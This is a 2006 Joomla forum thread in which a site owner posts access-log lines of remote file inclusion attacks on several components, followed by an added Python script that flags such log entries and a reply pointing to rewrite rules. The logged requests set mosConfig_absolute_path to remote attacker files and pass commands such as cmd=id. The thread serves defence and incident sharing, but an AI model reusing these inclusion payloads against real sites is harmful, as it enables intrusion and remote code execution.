Joomla!
http://forum.joomla.org/

List of New Joomla Module Attacks
http://forum.joomla.org/viewtopic.php?f=267&t=89352

Author:  slinky [ Sun Aug 27, 2006 12:59 am ]
Post subject:  List of New Joomla Module Attacks

I was just rocked by something that I've stopped temporarily before too much mail got out. I was lucky to find my server crawl instantly and nail EXIM before too much went out. Here is what I've found (I have hidden the address for the ultimate file) -- UPDATE: Looking at the time I was getting nailed with "undeliverable message" warnings it looks like the remository extended is the culprit....

Looks like they are hitting MTree (I have version 1.59), Remository Extended (I will replace with the regular), and Artlinks (I don't have this installed?), Savant2?, HUNDREDS of requests to hit Comprofiler... is there any way to filter out attempts to hack a Joomla server in trying to hit the mos_config? This is just killing my server.

Our troops shouldn't be in Iraq... they should be out seeking these @#$@#$s....


81.24.26.185 - - [26/Aug/2006:18:28:57 -0400] "GET /administrator/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://XXXXXXXXXXXXXX/gi8ani/exploit.txt? HTTP/1.1" 301 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

81.215.225.126 - - [26/Aug/2006:15:04:06 -0400] "GET /administrator/component/com_remository/admin.remository.php?mosConfig_absolute_path=http://XXXXXXXXX/test.tar.gz?&list=1&cmd=id HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

81.215.225.126 - - [26/Aug/2006:14:59:50 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://XXXXXXXX/test.tar.gz?&list=1&cmd=id HTTP/1.0" 200 46 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

58.224.150.102 - - [26/Aug/2006:12:36:39 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://XXXXXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 200 46 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

61.3.96.8 - - [26/Aug/2006:12:36:22 -0400] "GET /com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http:XXXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


60.190.243.175 - - [26/Aug/2006:12:35:58 -0400] "GET /Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://XXXXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 301 0 "-" "-"

201.248.90.194 - - [26/Aug/2006:12:34:45 -0400] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://XXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

201.248.90.194 - - [26/Aug/2006:12:34:40 -0400] "HEAD /Savant2_Plugin_textarea.php?mosConfig_absolute_path= HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"  [WHAT IS THIS????]

212.55.155.34 - - [26/Aug/2006:07:18:22 -0400] "GET /component/option,com_comprofiler/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://XXXXXXXX/e.txt? HTTP/1.1" 200 25277 "-" "libwww-perl/5.803"
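
An added example, not part of the original post and not the Joomla! rewrite rules: a small Python triage of access-log lines like the ones above, flagging requests that set a mosConfig_* parameter and separating those that got a 200 from those that were redirected. The names classify, triage and SAMPLE are hypothetical, the sample lines are constructed (documentation IPs, placeholder host), and the percent-encoded case goes beyond what the post shows.

```python
import re
from urllib.parse import parse_qsl

# Apache combined log format: client, timestamp, request line, status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
# A value that starts with a URL scheme; also matches the "http:host" form
REMOTE_RE = re.compile(r'^(?:https?|ftp):', re.I)

def classify(line):
    """Return a finding for a request that sets a mosConfig_* parameter, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path, _, query = m['target'].partition('?')
    # parse_qsl percent-decodes, so an encoded scheme is still recognised
    for key, value in parse_qsl(query, keep_blank_values=True):
        if not key.lower().startswith('mosconfig_'):
            continue
        if REMOTE_RE.match(value.strip()):
            kind = 'remote-url'
        elif value == '':
            kind = 'empty'
        else:
            kind = 'other'
        # 200 = something answered at this path; it does not prove the include ran
        return {'ip': m['ip'], 'method': m['method'], 'path': path,
                'param': key, 'kind': kind, 'answered': m['status'] == '200'}
    return None

def triage(lines):
    """Return (all findings, findings to review first: remote URL value and a 200)."""
    findings = [f for f in map(classify, lines) if f]
    return findings, [f for f in findings if f['kind'] == 'remote-url' and f['answered']]

# Constructed sample lines modelled on the entries in the post
SAMPLE = [
    '192.0.2.10 - - [26/Aug/2006:14:59:50 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://remote.invalid/test.tar.gz?&list=1&cmd=id HTTP/1.0" 200 46 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [26/Aug/2006:12:35:58 -0400] "GET /Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http:remote.invalid/x.txt? HTTP/1.0" 301 0 "-" "-"',
    '192.0.2.12 - - [26/Aug/2006:12:34:40 -0400] "HEAD /Savant2_Plugin_textarea.php?mosConfig_absolute_path= HTTP/1.0" 301 0 "-" "Mozilla/4.0"',
    '192.0.2.13 - - [26/Aug/2006:07:18:22 -0400] "GET /index.php?mosConfig_absolute_path=%68ttp%3A%2F%2Fremote.invalid%2Fe.txt HTTP/1.1" 200 25277 "-" "libwww-perl/5.803"',
    '192.0.2.14 - - [26/Aug/2006:07:20:00 -0400] "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
]

if __name__ == '__main__':
    for f in triage(SAMPLE)[0]:
        print(f['ip'], f['method'], f['path'], f['kind'], 'answered' if f['answered'] else 'not-200')
```

Entries in the second list are the ones to check first against the component actually installed at that path; a 301 with an empty body means the request never reached a script at that URL.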

Author:  RobS [ Sun Aug 27, 2006 1:29 am ]
Post subject:  Re: List of New Joomla Module Attacks

slinky wrote:
Is there any way to filter out attempts to hack a Joomla server in trying to hit the mos_config? This is just killing my server.


http://forum.joomla.org/index.php/topic,75376.0.html

Those rewrite rules are effective enough that it was decided to include them into the default htaccess.txt in Joomla! 1.0.11.  I know of several high traffic sites running them without any problems.  I hope it helps you too.

Author:  slinky [ Sun Aug 27, 2006 11:22 pm ]
Post subject:  Re: List of New Joomla Module Attacks

Perfect and muchas gracias. This is what I was looking for and will experiment with it. Incredible how many of these automated attacks are going on and CNET reported an increase in zombies of about 10% recently!

All times are UTC